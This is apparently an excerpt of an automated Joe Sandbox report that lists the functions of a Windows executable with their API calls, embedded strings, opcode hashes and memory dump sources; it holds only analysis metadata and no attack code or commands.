                                                                                                                                            • Opcode ID: 21079e0b07ac6ac13b1efb3e694a6ae9fc15d94165a90d399f4b9b68c1711a0c
                                                                                                                                            • Instruction ID: 7b2703de436e6824749a8d1c9fb3f579847d551b30dd58ec97d683f1e427c77e
                                                                                                                                            • Opcode Fuzzy Hash: 21079e0b07ac6ac13b1efb3e694a6ae9fc15d94165a90d399f4b9b68c1711a0c
                                                                                                                                            • Instruction Fuzzy Hash: BC11E8A7D0860783FB10AB00A9813742394AF4438CF640435C50CC76A1DE7FB9A5971A
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00007FF6EF6BDDB0: FindFirstFileW.KERNELBASE(?,?,?,?,?,00007FF6EF6BDC57), ref: 00007FF6EF6BDDFA
                                                                                                                                              • Part of subcall function 00007FF6EF6BDDB0: FindFirstFileW.KERNEL32 ref: 00007FF6EF6BDE2B
                                                                                                                                              • Part of subcall function 00007FF6EF6BDDB0: GetLastError.KERNEL32 ref: 00007FF6EF6BDE3A
                                                                                                                                            • FindClose.KERNELBASE ref: 00007FF6EF6BDC60
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1464966427-0
                                                                                                                                            • Opcode ID: 9045ae54a1564c21f2e510cde9f4d833ceb3cbc7bccef2113bc42fea38d961fa
                                                                                                                                            • Instruction ID: 90984ddc59c91eaf3515bca784213714f541d40070434ed553e980757cf47b03
                                                                                                                                            • Opcode Fuzzy Hash: 9045ae54a1564c21f2e510cde9f4d833ceb3cbc7bccef2113bc42fea38d961fa
                                                                                                                                            • Instruction Fuzzy Hash: 80F0812390C6C147EB119E7591443F827659B05BB8F084734EABC4F2CBCE9E9089972A
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 749574446-0
                                                                                                                                            • Opcode ID: 843bb97532330659db1f64e266b982f4e5cdcb856968631ea0d8171677117ef8
                                                                                                                                            • Instruction ID: 676cfff2675216450b8c496b5fa35dc659d0627b9da35b0158b7abb528d2230f
                                                                                                                                            • Opcode Fuzzy Hash: 843bb97532330659db1f64e266b982f4e5cdcb856968631ea0d8171677117ef8
                                                                                                                                            • Instruction Fuzzy Hash: 0AE0CD13B1052543EB149B36CC417381324EF8DF84F441030DE0D87365CF1AD591C609
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __vcrt_uninitialize_ptd
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1180542099-0
                                                                                                                                            • Opcode ID: 8ef332255f6b8c6c4f741829608c0e63700b8186080fd5d381217a6fa3415887
                                                                                                                                            • Instruction ID: 1ff3f63248a7afdd9e24908f078707c8b11cdffd759d3f452bec143369dbd888
                                                                                                                                            • Opcode Fuzzy Hash: 8ef332255f6b8c6c4f741829608c0e63700b8186080fd5d381217a6fa3415887
                                                                                                                                            • Instruction Fuzzy Hash: 18E0B653F1D20683ED54AB284D423B813682F14310F901536D01EC21D2ED1F7746761B
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ItemMessageSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3015471070-0
                                                                                                                                            • Opcode ID: 1b7d7cadcd6623d218b54f6ffec4c470525b694835c4cdf97ebde3ad9db0cc9f
                                                                                                                                            • Instruction ID: 06acebf14b955a9198b69737ac18ec78c9f3ca00e8507e6dbd9deb52625a8641
                                                                                                                                            • Opcode Fuzzy Hash: 1b7d7cadcd6623d218b54f6ffec4c470525b694835c4cdf97ebde3ad9db0cc9f
                                                                                                                                            • Instruction Fuzzy Hash: 74D0A796F1928683FB10A301B4193390311BF52B80F504230C94D5F791CE3FD1328B4A
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileType
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3081899298-0
                                                                                                                                            • Opcode ID: ebe3dc7161292714e69aba335fc43f49376bb13a634a5a82b6ea72084c8ac808
                                                                                                                                            • Instruction ID: bc7f5d16cc4919fba41b541d4b241b6dde775d46d889be5692007515f8fc9845
                                                                                                                                            • Opcode Fuzzy Hash: ebe3dc7161292714e69aba335fc43f49376bb13a634a5a82b6ea72084c8ac808
                                                                                                                                            • Instruction Fuzzy Hash: E7D0C91390A84293E9146735985123C2354AF42B35FA40B31E27ED16E2CF1EA696B21A
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1611563598-0
                                                                                                                                            • Opcode ID: c610d1a9c67004ed5c02865e722ec5e3a38e9a735714e81327301ce1d77fe7a9
                                                                                                                                            • Instruction ID: 69528e321349182506f8403df6c937a8119ea7ab7467acb08a62258981971fba
                                                                                                                                            • Opcode Fuzzy Hash: c610d1a9c67004ed5c02865e722ec5e3a38e9a735714e81327301ce1d77fe7a9
                                                                                                                                            • Instruction Fuzzy Hash: BEA01102F02002C3AA082BB20C8220803283B88B00F808020C008C02A0CE0CA2AAAB02
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                            • Opcode ID: 8b06ee4b06dc0b91c0a18f8228158a153803d49962856f9214b9ee8b30576176
                                                                                                                                            • Instruction ID: c5a5f96a4c9e988b77a082665190bab730ac7a19a5266f1aa5103874a7724685
                                                                                                                                            • Opcode Fuzzy Hash: 8b06ee4b06dc0b91c0a18f8228158a153803d49962856f9214b9ee8b30576176
                                                                                                                                            • Instruction Fuzzy Hash: 86F06257B0960387FE5456626D123F517A85F98B80F5C4431CD0EC72E2DE2EE684A21A
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                            • Opcode ID: 760b79e1028f6c46a4e72fb90bb68dc594781e66e65f09b218abdfffe4dfe5ea
                                                                                                                                            • Instruction ID: 4b4754d4ca0927a620f5313b05b91abd200346d6130be3e00b1e485628376e80
                                                                                                                                            • Opcode Fuzzy Hash: 760b79e1028f6c46a4e72fb90bb68dc594781e66e65f09b218abdfffe4dfe5ea
                                                                                                                                            • Instruction Fuzzy Hash: B1F0FF23A0824247FF618B24E0407782324DB04B78F682730E73C811CDDF3ADA9AE74A
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                            • Opcode ID: c65caaf763c3ab33a1535183b9383c6055f8091b4164183f1201565ffa92954d
                                                                                                                                            • Instruction ID: 0f8deae90b34e609a9eb71158e4c198974ca9cc292aef22c4be702ad930c69ae
                                                                                                                                            • Opcode Fuzzy Hash: c65caaf763c3ab33a1535183b9383c6055f8091b4164183f1201565ffa92954d
                                                                                                                                            • Instruction Fuzzy Hash: 00F08213B8C20683FE5467625D013B413B96F88FA4F284630DC2EC63C1DE2EEA41B61B
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Item$DialogMessageSendTextWindow
                                                                                                                                            • String ID: %s %s$REPLACEFILEDLG
                                                                                                                                            • API String ID: 1217692187-439456425
                                                                                                                                            • Opcode ID: 22531550e0a1cf0bd19cd76bd62179b0479e59159f3dbb295e98913310aec2fe
                                                                                                                                            • Instruction ID: 4cdf4272b77718f9c37f015b9b5b990024291eec17094074dd5b8e07ed12b222
                                                                                                                                            • Opcode Fuzzy Hash: 22531550e0a1cf0bd19cd76bd62179b0479e59159f3dbb295e98913310aec2fe
                                                                                                                                            • Instruction Fuzzy Hash: 5B91C86770868287FB20AF21E8553F92355FB84B88F504135DA0D8BB9ADF3FD605970A
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Filewcscpy$CloseDeleteHandle$CreateErrorLastProcess$ControlCurrentDeviceDirectoryOpenRemoveToken
                                                                                                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                            • API String ID: 3201109463-3508440684
                                                                                                                                            • Opcode ID: 0492517c559859d46da067de4b96b3a0353f50bb79d0686b4473a232aa762f12
                                                                                                                                            • Instruction ID: 0ba5595be3f98ea29869578bd94c2a2d6fb99840b50aad557dab98836b2bdd1c
                                                                                                                                            • Opcode Fuzzy Hash: 0492517c559859d46da067de4b96b3a0353f50bb79d0686b4473a232aa762f12
                                                                                                                                            • Instruction Fuzzy Hash: 54E18423A0868287EB20DB20E8507FD6368FF41784F504531EA9DC769AEF3EE505D70A
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter_noinfomemcpy_s$fegetenv
                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                            • API String ID: 281475176-2761157908
                                                                                                                                            • Opcode ID: f068c9ac5b184d3e8060cf8fcbfca69774e69d4a752ab7d3af02b0ffdf29b8f8
                                                                                                                                            • Instruction ID: 83473d7d92e7ba59c548f7e1c05b514ba61e1e7b34e73b987d384fe0fdc02759
                                                                                                                                            • Opcode Fuzzy Hash: f068c9ac5b184d3e8060cf8fcbfca69774e69d4a752ab7d3af02b0ffdf29b8f8
                                                                                                                                            • Instruction Fuzzy Hash: 79B21973E182828BE7258E69DC407FD37A9FB4438CF505135DA1A9BB84DF3AE6049B05
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                                                                                            • String ID: ;%u$x%u$xc%u
                                                                                                                                            • API String ID: 449872665-2277559157
                                                                                                                                            • Opcode ID: 6a17a56be1e43b4ccab18cc4b6a8258449a75d3b64fbcb6a86b421c5decf75c4
                                                                                                                                            • Instruction ID: 614e9f1eedb2777d28c97b00685a8211e187b5d9af51c3ad1baa8824ccbb48fd
                                                                                                                                            • Opcode Fuzzy Hash: 6a17a56be1e43b4ccab18cc4b6a8258449a75d3b64fbcb6a86b421c5decf75c4
                                                                                                                                            • Instruction Fuzzy Hash: 8342C223B1868253EE14DB2591463FE6359AF45784F404831EB8ECB79ADF7EE044E70A
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                            • Opcode ID: 1cccea8635c3508c15296068c359dbd06a7f7fdb47bc52dff3748f3d4d690920
                                                                                                                                            • Instruction ID: d2e65683a8427ddf192d93ed68efc12817e4100a8e3d92e57913556156d450f8
                                                                                                                                            • Opcode Fuzzy Hash: 1cccea8635c3508c15296068c359dbd06a7f7fdb47bc52dff3748f3d4d690920
                                                                                                                                            • Instruction Fuzzy Hash: C1316F73609B8187EB609F60E8407ED3364FB94744F84443ADA4E87A88DF39D648CB15
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
